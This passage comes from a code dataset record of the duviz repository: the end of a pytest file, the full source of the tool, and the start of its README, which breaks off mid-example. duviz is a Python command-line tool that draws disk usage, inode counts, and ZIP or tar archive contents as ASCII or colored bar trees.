textwrap.dedent(s.lstrip(\"\\n\").rstrip(\" \"))\n\n\ndef _dedent_and_split(s: str) -> List[str]:\n return _dedent(s).strip(\"\\n\").split(\"\\n\")\n\n\[email protected]([\"input\", \"output\"], [\n (\"foo\", \"foo\"),\n (\" foo\\n bar\", \"foo\\nbar\"),\n (\"\\n foo\\n bar\", \"foo\\nbar\"),\n (\"\\n foo\\n bar\\n\", \"foo\\nbar\\n\"),\n (\"\\n foo\\n bar\\n \", \"foo\\nbar\\n\"),\n (\"\\n foo\\n bar\\n \", \"foo\\n bar\\n\"),\n (\"\\n foo\\n bar\\n \", \" foo\\nbar\\n\"),\n])\ndef test_dedent(input, output):\n assert _dedent(input) == output\n\n\[email protected]([\"input\", \"output\"], [\n (\"foo\", [\"foo\"]),\n (\" foo\\n bar\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n \", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n \", [\"foo\", \" bar\"]),\n (\"\\n foo\\n bar\\n \", [\" foo\", \"bar\"]),\n])\ndef test_dedent_and_split(input, output):\n assert _dedent_and_split(input) == output\n\n\ndef test_build_du_tree1():\n directory = 'path/to'\n du_listing = _dedent_and_split('''\n 120 path/to/foo\n 10 path/to/bar/a\n 163 path/to/bar/b\n 360 path/to/bar/c\n 612 path/to/bar\n 2 path/to/s p a c e s\n 800 path/to\n ''')\n tree = DuProcessor.from_du_listing(directory, du_listing)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = _dedent_and_split('''\n ________________________________________\n [ path/to ]\n [_______________819.20KB_______________]\n [ bar ][foo ] \\n\\\n [__________626.69KB__________][122.] \\n\\\n [ c ][ b ]| \\n\\\n [____368.64KB___][166.91]| \\n\\\n ''')\n assert result == expected\n\n\ndef test_build_du_tree2():\n directory = 'path/to'\n du_listing = _dedent_and_split('''\n 1 path/to/A\n 1 path/to/b\n 2 path/to/C\n 4 path/to\n ''')\n tree = DuProcessor.from_du_listing(directory, du_listing)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = _dedent_and_split('''\n ________________________________________\n [ path/to ]\n [________________4.10KB________________]\n [ C ][ b ][ A ]\n [______2.05KB______][_1.02KB_][_1.02KB_]\n ''')\n assert result == expected\n\n\ndef _check_ls_listing_render(ls_listing: str, expected: str, directory='path/to', width=40):\n \"\"\"Helper to parse a ls listing, render as ASCII bars and check result\"\"\"\n tree = InodeProcessor.from_ls_listing(\n root=directory, ls_listing=_dedent(ls_listing)\n )\n result = AsciiDoubleLineBarRenderer().render(tree, width=width)\n assert result == _dedent_and_split(expected)\n\n\ndef test_inode_tree_bsd_ls_simple():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_with_hardlink():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n 333 hardlink.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_subdir():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 directory\n 555 anotherfile.txt\n\n path/to/directory:\n 444 .\n 222 ..\n 666 devil.txt\n 777 god.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________6___________________]\n [ directory ] \\n\\\n [_____2_____] \\n\\\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_various():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 2395 .\n 2393 ..\n 2849 bar\n 1166 barln\n 2845 a.txt\n 2846 b b b.txt\n 2842 c.txt\n\n path/to/A:\n 2849 .\n 2395 ..\n 2851 d.txt\n 2852 e.txt\n\n path/to/B:\n 1166 .\n 2395 ..\n 2852 bla.txt\n 1174 zaza\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________9___________________]\n [ A ][ B ] \\n\\\n [__2___][_1_] \\n\\\n \"\"\"\n )\n\n\ndef test_inode_tree_gnu_ls_simple():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n path/to:\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_gnu_ls_various():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n path/to:\n 2395 .\n 2393 ..\n 2849 bar\n 1166 barln\n 2845 a.txt\n 2846 b b b.txt\n 2842 c.txt\n\n path/to/A:\n 2849 .\n 2395 ..\n 2851 d.txt\n 2852 e.txt\n\n path/to/B:\n 1166 .\n 2395 ..\n 2852 bla.txt\n 1174 zaza\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________9___________________]\n [ A ][ B ] \\n\\\n [__2___][_1_] \\n\\\n \"\"\"\n )\n\n\ndef test_get_progress_reporter():\n output = []\n\n # Artificial time function: 1 second per call\n time = itertools.count(10).__next__\n progress = get_progress_reporter(write=lambda s: output.append(s), time=time, max_interval=10, terminal_width=10)\n for i in range(200):\n progress('path-{i}'.format(i=i))\n\n assert all(len(line.rstrip(\"\\r\")) <= 10 for line in output)\n # Extract \"printed\" path indexes\n indexes = [int(line.partition(\"-\")[-1]) for line in output]\n assert indexes[0] == 0\n # Check time deltas: initial ones should be small, final ones large\n deltas = [i1-i0 for (i0, i1) in zip(indexes[:-1], indexes[1:])]\n assert all(d < 5 for d in deltas[:5])\n assert all(d > 9 for d in deltas[-5:])\n\n\nclass TestZipFileProcessor:\n @pytest.fixture\n def zip_file(self, tmp_path):\n path = tmp_path / \"data.zip\"\n with zipfile.ZipFile(path, \"w\", compression=zipfile.ZIP_DEFLATED) as zf:\n with zf.open(\"alpha/abc100.txt\", \"w\") as f:\n f.write(b\"abcdefghijklmnopqrstuvwxyz\" * 100)\n with zf.open(\"alpha/abbcccdddde.txt\", \"w\") as f:\n f.write(b\"abbcccdddde\" * 2 * 100)\n with zf.open(\"0.txt\", \"w\") as f:\n f.write(b\"0\" * 26 * 100)\n return path\n\n def test_default(self, zip_file):\n tree = ZipFileProcessor.from_zipfile(zip_file)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(zip_file), width=40),\n \"[_________________99B__________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_____________79B_____________][__20B__]\",\n \"[ abc100.txt ][abbcccdddd] \",\n \"[_______49B_______][___30B____] \",\n ]\n assert result == expected\n\n def test_expanded(self, zip_file):\n tree = ZipFileProcessor.from_zipfile(zip_file, compressed=False)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(zip_file), width=40),\n \"[________________7.40KB________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_________4.80KB________][____2.60KB___]\",\n \"[ abc100.txt][abbcccdddd] \",\n \"[___2.60KB__][__2.20KB__] \",\n ]\n assert result == expected\n\n\ndef _create_file(path: Path, content: str) -> Path:\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open(\"w\", encoding=\"utf-8\") as f:\n f.write(content)\n return path\n\n\nclass TestTarFileProcessor:\n @pytest.fixture(params=[(\"w:\", \".tar\"), (\"w:gz\", \".tar.gz\"), (\"w:bz2\", \".tar.bz2\")])\n def tar_file(self, request, tmp_path):\n mode, ext = request.param\n path = tmp_path / f\"data{ext}\"\n with tarfile.open(path, mode) as tf:\n\n def create(rel_path: str, content: str):\n tf.add(\n name=_create_file(tmp_path / rel_path, content), arcname=rel_path\n )\n\n create(\"alpha/abc100.txt\", \"abcdefghijklmnopqrstuvwxyz\" * 100)\n create(\"alpha/abbcccdddde.txt\", \"abbcccdddde\" * 2 * 100)\n create(\"0.txt\", \"0\" * 26 * 100)\n return path\n\n def test_default(self, tar_file):\n tree = TarFileProcessor.from_tar_file(tar_file)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(tar_file), width=40),\n \"[________________7.40KB________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_________4.80KB________][____2.60KB___]\",\n \"[ abc100.txt][abbcccdddd] \",\n \"[___2.60KB__][__2.20KB__] \",\n ]\n assert result == expected\n"
},
{
"alpha_fraction": 0.540019154548645,
"alphanum_fraction": 0.5466817617416382,
"avg_line_length": 30.89444351196289,
"blob_id": "5ace1c7269400ef9c348d01aa62290fc9db559f2",
"content_id": "5f4a0889e4d905e16cd12b9dd8eaca69c19860fd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22964,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 720,
"path": "/duviz.py",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"\nCommand line tool for visualization of the disk space usage of a directory\nand its subdirectories.\n\nCopyright: 2009-2023 Stefaan Lippens\nLicense: MIT\nWebsite: https://github.com/soxofaan/duviz\n\"\"\"\n\nimport argparse\nimport contextlib\nimport itertools\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport time\nimport unicodedata\nfrom typing import Any, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union\nimport zipfile\nfrom pathlib import Path\n\n\n# TODO: catch absence/failure of du/ls subprocesses\n# TODO: how to handle unreadable subdirs in du/ls?\n# TODO: option to sort alphabetically (instead of on size)\n# TODO: use pathlib.Path instead of naive strings where appropriate\n\n\n__version__ = \"3.2.0\"\n\n\ndef path_split(path: str, base: str = \"\") -> List[str]:\n \"\"\"\n Split a file system path in a list of path components (as a recursive os.path.split()),\n optionally only up to a given base path.\n \"\"\"\n if base.endswith(os.path.sep):\n base = base.rstrip(os.path.sep)\n items = []\n while True:\n if path == base:\n items.insert(0, path)\n break\n path, tail = os.path.split(path)\n if tail != '':\n items.insert(0, tail)\n if path == '':\n break\n if path == '/':\n items.insert(0, path)\n break\n return items\n\n\nclass SubprocessException(RuntimeError):\n pass\n\n\nclass SizeTree:\n \"\"\"\n Base class for a tree of nodes where each node has a size and zero or more sub-nodes.\n \"\"\"\n\n __slots__ = [\"name\", \"size\", \"children\"]\n\n def __init__(\n self, name: str, size: int = 0, children: Optional[Dict[str, \"SizeTree\"]] = None\n ):\n self.name = name\n self.size = size\n self.children = children or {}\n\n @classmethod\n def from_path_size_pairs(\n cls,\n pairs: Iterable[Tuple[List[str], int]],\n root: str = \"/\",\n _recalculate_sizes: bool = False,\n ) -> \"SizeTree\":\n \"\"\"\n Build SizeTree from given (path, size) pairs\n \"\"\"\n tree = cls(name=root)\n for path, size in pairs:\n cursor = tree\n for component in path:\n if component not in cursor.children:\n # TODO: avoid redundancy of name: as key in children dict and as name\n cursor.children[component] = cls(name=component)\n cursor = cursor.children[component]\n cursor.size = size\n\n if _recalculate_sizes:\n # TODO: automatically detect need to recalculate sizes\n tree._recalculate_own_sizes_to_total_sizes()\n return tree\n\n def __lt__(self, other: \"SizeTree\") -> bool:\n # We only implement rich comparison method __lt__ so make sorting work.\n return (self.size, self.name) < (other.size, other.name)\n\n def _recalculate_own_sizes_to_total_sizes(self) -> int:\n \"\"\"\n If provided sizes are just own sizes and sizes of children still have to be included\n \"\"\"\n self.size = self.size + sum(c._recalculate_own_sizes_to_total_sizes() for c in self.children.values())\n return self.size\n\n\nclass DuProcessor:\n \"\"\"\n Size tree from `du` (disk usage) listings\n \"\"\"\n\n _du_regex = re.compile(r'([0-9]*)\\s*(.*)')\n\n @classmethod\n def from_du(\n cls,\n root: str,\n one_filesystem: bool = False,\n dereference: bool = False,\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n # Measure size in 1024 byte blocks. The GNU-du option -b enables counting\n # in bytes directly, but it is not available in BSD-du.\n command = ['du', '-k']\n # Handling of symbolic links.\n if one_filesystem:\n command.append('-x')\n if dereference:\n command.append('-L')\n command.append(root)\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n raise SubprocessException('Failed to launch \"du\" utility subprocess. Is it installed and in your PATH?')\n\n with contextlib.closing(process.stdout):\n return cls.from_du_listing(\n root=root,\n du_listing=(line.decode(\"utf-8\") for line in process.stdout),\n progress_report=progress_report,\n )\n\n @classmethod\n def from_du_listing(\n cls,\n root: str,\n du_listing: Iterable[str],\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n def pairs(lines: Iterable[str]) -> Iterator[Tuple[List[str], int]]:\n for line in lines:\n kb, path = cls._du_regex.match(line).group(1, 2)\n if progress_report:\n progress_report(path)\n yield path_split(path, root)[1:], 1024 * int(kb)\n\n return SizeTree.from_path_size_pairs(root=root, pairs=pairs(du_listing))\n\n\nclass InodeProcessor:\n\n @classmethod\n def from_ls(\n cls, root: str, progress_report: Optional[Callable[[str], None]] = None\n ) -> SizeTree:\n command = [\"ls\", \"-aiR\", root]\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n raise SubprocessException('Failed to launch \"ls\" subprocess.')\n\n with contextlib.closing(process.stdout):\n return cls.from_ls_listing(\n root=root,\n ls_listing=process.stdout.read().decode('utf-8'),\n progress_report=progress_report\n )\n\n @classmethod\n def from_ls_listing(\n cls,\n root: str,\n ls_listing: str,\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n def pairs(listing: str) -> Iterator[Tuple[List[str], int]]:\n all_inodes = set()\n\n # Process data per directory block (separated by two newlines)\n blocks = listing.rstrip('\\n').split('\\n\\n')\n for i, dir_ls in enumerate(blocks):\n items = dir_ls.split('\\n')\n\n # Get current path in directory tree\n if i == 0 and not items[0].endswith(':'):\n # BSD compatibility: in first block the root directory can be omitted\n path = root\n else:\n path = items.pop(0).rstrip(':')\n\n # Collect inodes for current directory\n count = 0\n for item in items:\n inode, name = item.lstrip().split(' ', 1)\n # Skip parent entry\n if name == '..':\n continue\n # Get and process inode\n inode = int(inode)\n if inode not in all_inodes:\n count += 1\n all_inodes.add(inode)\n\n if progress_report:\n progress_report(path)\n yield path_split(path, root)[1:], count\n\n tree = SizeTree.from_path_size_pairs(\n pairs=pairs(ls_listing), root=root, _recalculate_sizes=True\n )\n return tree\n\n\nclass ZipFileProcessor:\n \"\"\"Build `SizeTree` from a file tree in a ZIP archive file.\"\"\"\n\n @staticmethod\n def from_zipfile(path: Union[str, Path], compressed: bool = True) -> SizeTree:\n # TODO: handle zipfile.BadZipFile in nicer way?\n with zipfile.ZipFile(path, mode=\"r\") as zf:\n if compressed:\n pairs = (\n (path_split(z.filename), z.compress_size) for z in zf.infolist()\n )\n else:\n pairs = ((path_split(z.filename), z.file_size) for z in zf.infolist())\n return SizeTree.from_path_size_pairs(\n pairs=pairs, root=str(path), _recalculate_sizes=True\n )\n\n\nclass TarFileProcessor:\n \"\"\"Build `SizeTree` from file tree in a tar archive file.\"\"\"\n\n @staticmethod\n def from_tar_file(path: Union[str, Path]) -> SizeTree:\n with tarfile.open(path, mode=\"r\") as tf:\n pairs = ((path_split(m.name), m.size) for m in tf.getmembers())\n return SizeTree.from_path_size_pairs(\n pairs=pairs, root=str(path), _recalculate_sizes=True\n )\n\n\nclass SizeFormatter:\n \"\"\"Render a (byte) count in compact human-readable way: 12, 34k, 56M, ...\"\"\"\n\n __slots__ = [\"base\", \"formats\"]\n\n def __init__(self, base: int, formats: List[str]):\n self.base = base\n self.formats = formats\n\n def format(self, size: int) -> str:\n for f in self.formats[:-1]:\n if round(size, 2) < self.base:\n return f % size\n size = float(size) / self.base\n return self.formats[-1] % size\n\n\nSIZE_FORMATTER_COUNT = SizeFormatter(1000, ['%d', '%.2fk', '%.2fM', '%.2fG', '%.2fT'])\nSIZE_FORMATTER_BYTES = SizeFormatter(1000, ['%dB', '%.2fKB', '%.2fMB', '%.2fGB', '%.2fTB'])\nSIZE_FORMATTER_BYTES_BINARY = SizeFormatter(1024, ['%dB', '%.2fKiB', '%.2fMiB', '%.2fGiB', '%.2fTiB'])\n\n\nclass TreeRenderer:\n \"\"\"Base class for SizeTree renderers\"\"\"\n\n def __init__(self, max_depth: int = 5, size_formatter: SizeFormatter = SIZE_FORMATTER_COUNT):\n self.max_depth = max_depth\n self._size_formatter = size_formatter\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n raise NotImplementedError\n\n @staticmethod\n def bar(\n label: str,\n width: int,\n fill: str = \"-\",\n left: str = \"[\",\n right: str = \"]\",\n small: str = \"|\",\n label_padding: str = \"\",\n ) -> str:\n \"\"\"\n Render a label as string of certain width with given left, right part and fill.\n\n @param label the label to be rendered (will be clipped if too long).\n @param width the desired total width\n @param fill the fill character to fill empty space\n @param left the symbol to use at the left of the bar\n @param right the symbol to use at the right of the bar\n @param small the character to use when the bar is too small\n @param label_padding additional padding for the label\n\n @return rendered string\n \"\"\"\n inner_width = width - len(left) - len(right)\n if inner_width >= 0:\n # Normalize unicode so that unicode code point count corresponds to character count as much as possible\n label = unicodedata.normalize('NFC', label)\n if len(label) < inner_width:\n label = label_padding + label + label_padding\n b = left + label[:inner_width].center(inner_width, fill) + right\n else:\n b = (small * width)[:width]\n return b\n\n\nclass AsciiDoubleLineBarRenderer(TreeRenderer):\n \"\"\"\n Render a SizeTree with two line ASCII bars,\n containing name and size of each node.\n\n Example:\n\n ________________________________________\n [ foo ]\n [_______________49.15KB________________]\n [ bar ][ baz ]\n [________32.77KB_________][__16.38KB___]\n \"\"\"\n\n _top_line_fill = '_'\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = []\n if self._top_line_fill:\n lines.append(self._top_line_fill * width)\n return lines + self._render(tree, width, self.max_depth)\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n \"\"\"Render a single node\"\"\"\n return [\n self.bar(\n label=node.name,\n width=width, fill=' ', left='[', right=']', small='|'\n ),\n self.bar(\n label=self._size_formatter.format(node.size),\n width=width, fill='_', left='[', right=']', small='|'\n )\n ]\n\n def _render(self, tree: SizeTree, width: int, depth: int) -> List[str]:\n lines = []\n if width < 1 or depth < 0:\n return lines\n\n # Render current dir.\n lines.extend(self.render_node(node=tree, width=width))\n\n # Render children.\n # TODO option to sort alphabetically\n children = sorted(tree.children.values(), reverse=True)\n if children:\n # Render each child as a subtree, which is a list of lines.\n subtrees = []\n cumulative_size = 0\n last_col = 0\n for child in children:\n cumulative_size += child.size\n curr_col = int(float(width * cumulative_size) / tree.size)\n subtrees.append(self._render(child, curr_col - last_col, depth - 1))\n last_col = curr_col\n # Assemble blocks.\n height = max(len(t) for t in subtrees)\n for i in range(height):\n line = ''\n for subtree in subtrees:\n if i < len(subtree):\n line += subtree[i]\n elif subtree:\n line += ' ' * self._str_len(subtree[0])\n lines.append(line + ' ' * (width - self._str_len(line)))\n\n return lines\n\n def _str_len(self, b: str) -> int:\n return len(b)\n\n\nclass AsciiSingleLineBarRenderer(AsciiDoubleLineBarRenderer):\n \"\"\"\n Render a SizeTree with one-line ASCII bars.\n\n Example:\n\n [........... foo/: 61.44KB ............]\n [.... bar: 36.86KB ....][baz: 20.48K]\n \"\"\"\n _top_line_fill = None\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self.bar(\n label=\"{n}: {s}\".format(n=node.name, s=self._size_formatter.format(node.size)),\n width=width, fill='.', left='[', right=']', small='|', label_padding=' '\n )\n ]\n\n\nclass Colorizer:\n # Markers to start and end a color\n _START = '\\x01'\n _END = '\\x02'\n\n # Red, Green, Yellow\n _COLOR_CYCLE_RGY = [\"\\x1b[41;97m\", \"\\x1b[42;30m\", \"\\x1b[43;30m\"]\n\n # Blue, Magenta, Cyan\n _COLOR_CYCLE_BMC = [\"\\x1b[44;97m\", \"\\x1b[45;30m\", \"\\x1b[46;30m\"]\n\n _COLOR_RESET = \"\\x1b[0m\"\n\n @classmethod\n def wrap(cls, s: str) -> str:\n \"\"\"Wrap given string in colorize markers\"\"\"\n return cls._START + s + cls._END\n\n @classmethod\n def str_len(cls, b: str) -> int:\n return len(b.replace(cls._START, \"\").replace(cls._END, \"\"))\n\n @classmethod\n def _get_colorize(cls, colors: List[str]):\n \"\"\"Construct function that replaces markers with color codes (cycling through given color codes)\"\"\"\n color_cycle = itertools.cycle(colors)\n\n def colorize(line: str) -> str:\n line = re.sub(cls._START, lambda m: next(color_cycle), line)\n line = re.sub(cls._END, cls._COLOR_RESET, line)\n return line\n\n return colorize\n\n @classmethod\n def get_colorize_rgy(cls):\n return cls._get_colorize(cls._COLOR_CYCLE_RGY)\n\n @classmethod\n def get_colorize_bmc(cls):\n return cls._get_colorize(cls._COLOR_CYCLE_BMC)\n\n\nclass ColorDoubleLineBarRenderer(AsciiDoubleLineBarRenderer):\n \"\"\"\n Render a SizeTree with two line ANSI color bars,\n \"\"\"\n\n _top_line_fill = None\n _colorizer = Colorizer()\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self._colorizer.wrap(self.bar(\n label=node.name,\n width=width, fill=' ', left='', right='', small=' ',\n )),\n self._colorizer.wrap(self.bar(\n label=self._size_formatter.format(node.size),\n width=width, fill=' ', left='', right='', small=' ',\n )),\n ]\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = super().render(tree=tree, width=width)\n colorize_cycle = itertools.cycle([\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_bmc(),\n self._colorizer.get_colorize_bmc(),\n ])\n return [colorize(line) for (line, colorize) in zip(lines, colorize_cycle)]\n\n def _str_len(self, b: str) -> int:\n return self._colorizer.str_len(b)\n\n\nclass ColorSingleLineBarRenderer(AsciiSingleLineBarRenderer):\n \"\"\"\n Render a SizeTree with one line ANSI color bars,\n \"\"\"\n\n _top_line_fill = None\n _colorizer = Colorizer()\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self._colorizer.wrap(self.bar(\n label=\"{n}: {s}\".format(n=node.name, s=self._size_formatter.format(node.size)),\n width=width, fill=' ', left='', right='', small=' ',\n ))\n ]\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = super().render(tree=tree, width=width)\n colorize_cycle = itertools.cycle([\n self._colorizer.get_colorize_rgy(),\n self._colorizer.get_colorize_bmc(),\n ])\n return [colorize(line) for (line, colorize) in zip(lines, colorize_cycle)]\n\n def _str_len(self, b: str) -> int:\n return self._colorizer.str_len(b)\n\n\ndef get_progress_reporter(\n max_interval: float = 1,\n terminal_width: int = 80,\n write: Callable[[str], Any] = sys.stdout.write,\n time: Callable[[], float] = time.time,\n) -> Callable[[str], None]:\n \"\"\"\n Create a progress reporting function that only actually prints in intervals\n \"\"\"\n next_time = 0.0\n # Start printing frequently.\n interval = 0.0\n\n def progress(info: str):\n nonlocal next_time, interval\n if time() > next_time:\n write(info.ljust(terminal_width)[:terminal_width] + '\\r')\n next_time = time() + interval\n # Converge to max interval.\n interval = 0.9 * interval + 0.1 * max_interval\n\n return progress\n\n\ndef main():\n terminal_width = shutil.get_terminal_size().columns\n\n # Handle commandline interface.\n cli = argparse.ArgumentParser(\n prog=\"duviz\",\n description=\"Render ASCII-art representation of disk space usage.\",\n )\n cli.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {__version__}\")\n cli.add_argument(\n \"paths\",\n metavar=\"PATH\",\n nargs=\"*\",\n help=\"Directories or ZIP/tar archives to scan\",\n default=[\".\"],\n )\n cli.add_argument(\n \"-w\",\n \"--width\",\n type=int,\n dest=\"display_width\",\n default=terminal_width,\n help=\"total width of all bars\",\n metavar=\"WIDTH\",\n )\n cli.add_argument(\n \"-x\",\n \"--one-file-system\",\n action=\"store_true\",\n dest=\"one_file_system\",\n default=False,\n help=\"skip directories on different filesystems\",\n )\n cli.add_argument(\n \"-L\",\n \"--dereference\",\n action=\"store_true\",\n dest=\"dereference\",\n default=False,\n help=\"dereference all symbolic links\",\n )\n cli.add_argument(\n \"--max-depth\",\n action=\"store\",\n type=int,\n dest=\"max_depth\",\n default=5,\n help=\"maximum recursion depth\",\n metavar=\"N\",\n )\n cli.add_argument(\n \"-i\",\n \"--inodes\",\n action=\"store_true\",\n dest=\"inode_count\",\n default=False,\n help=\"count inodes instead of file size\",\n )\n cli.add_argument(\n \"--no-progress\",\n action=\"store_false\",\n dest=\"show_progress\",\n default=True,\n help=\"disable progress reporting\",\n )\n cli.add_argument(\n \"-1\",\n \"--one-line\",\n action=\"store_true\",\n dest=\"one_line\",\n default=False,\n help=\"Show one line bars instead of two line bars\",\n )\n cli.add_argument(\n \"-c\",\n \"--color\",\n action=\"store_true\",\n dest=\"color\",\n default=False,\n help=\"Use colors to render bars (instead of ASCII art)\",\n )\n cli.add_argument(\n # TODO short option, \"-z\"?\n \"--zip\",\n action=\"store_true\",\n dest=\"zip\",\n help=\"Force ZIP-file handling of given paths (e.g. lacking a traditional `.zip` extension).\",\n )\n cli.add_argument(\n \"--unzip-size\",\n action=\"store_true\",\n help=\"Visualize decompressed file size instead of compressed file size for ZIP files.\",\n )\n cli.add_argument(\n # TODO short option?\n \"--tar\",\n action=\"store_true\",\n dest=\"tar\",\n help=\"\"\"\n Force tar-file handling of given paths\n (e.g. lacking a traditional extension like `.tar`, `.tar.gz`, ...).\n \"\"\",\n )\n\n args = cli.parse_args()\n\n # Make sure we have a valid list of paths\n paths: List[str] = []\n for path in args.paths:\n if os.path.exists(path):\n paths.append(path)\n else:\n sys.stderr.write('Warning: not a valid path: \"%s\"\\n' % path)\n\n if args.show_progress:\n progress_report = get_progress_reporter(terminal_width=args.display_width)\n else:\n progress_report = None\n\n for path in paths:\n if args.zip or (\n os.path.isfile(path) and os.path.splitext(path)[1].lower() == \".zip\"\n ):\n tree = ZipFileProcessor.from_zipfile(path, compressed=not args.unzip_size)\n size_formatter = SIZE_FORMATTER_BYTES\n elif args.tar or (\n os.path.isfile(path)\n and any(\n path.endswith(ext) for ext in {\".tar\", \".tar.gz\", \".tgz\", \"tar.bz2\"}\n )\n ):\n tree = TarFileProcessor().from_tar_file(path)\n size_formatter = SIZE_FORMATTER_BYTES\n elif args.inode_count:\n tree = InodeProcessor.from_ls(root=path, progress_report=progress_report)\n size_formatter = SIZE_FORMATTER_COUNT\n else:\n tree = DuProcessor.from_du(\n root=path,\n one_filesystem=args.one_file_system,\n dereference=args.dereference,\n progress_report=progress_report,\n )\n size_formatter = SIZE_FORMATTER_BYTES\n\n max_depth = args.max_depth\n if args.one_line:\n if args.color:\n renderer = ColorSingleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n renderer = AsciiSingleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n if args.color:\n renderer = ColorDoubleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n else:\n renderer = AsciiDoubleLineBarRenderer(\n max_depth=max_depth, size_formatter=size_formatter\n )\n\n print(\"\\n\".join(renderer.render(tree, width=args.display_width)))\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5731250047683716,
"alphanum_fraction": 0.590624988079071,
"avg_line_length": 44.71428680419922,
"blob_id": "00c8f402002e0973c54f743617360771bc186bb4",
"content_id": "6fcbad018f0191349415835a382f806f744663f0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4800,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 105,
"path": "/README.rst",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": ".. image:: https://img.shields.io/pypi/pyversions/duviz\n :target: https://pypi.org/project/duviz/\n :alt: PyPI - Python Version\n.. image:: https://github.com/soxofaan/duviz/actions/workflows/unittests.yml/badge.svg?branch=main\n :target: https://github.com/soxofaan/duviz/actions/workflows/unittests.yml\n :alt: unit tests\n.. image:: https://github.com/soxofaan/duviz/actions/workflows/pre-commit.yml/badge.svg?branch=main\n :target: https://github.com/soxofaan/duviz/actions/workflows/pre-commit.yml\n :alt: pre-commit\n\n\nWhat is duviz?\n--------------\n\n``duviz`` is a (Python 3) command-line tool to visualize disk space usage.\n\nIt's like the plethora of desktop applications and widgets\n(e.g. Filelight, DaisyDisk, WinDirStat, JDiskReport, TreeSize, SpaceSniffer, ...),\nbut instead of a fancy GUI with animated pie charts and shaded boxes\nyou get a funky \"ASCII art style hierarchical tree of bars\" in your shell.\nIf that didn't make a lot of sense to you, look at this example of this ``/opt`` folder::\n\n $ duviz /opt\n ________________________________________________________________________________\n [ /opt ]\n [____________________________________3.30GB____________________________________]\n [ local ]\n [____________________________________3.30GB____________________________________]\n [ var ][ lib ][ share ][Libr][lib][]|\n [_____________1.36GB____________][______925.47MB______][411.37MB][231.][222][]|\n [ macports ]|[gcc][gcc4][]||| [][]||||||[Fra]|[gc] |\n [____________1.36GB____________]|[250][226.][]||| [][]||||||[231]|[21] |\n [ software ][distfile][]| | || | | ||||||||[Pyt] [x8]\n 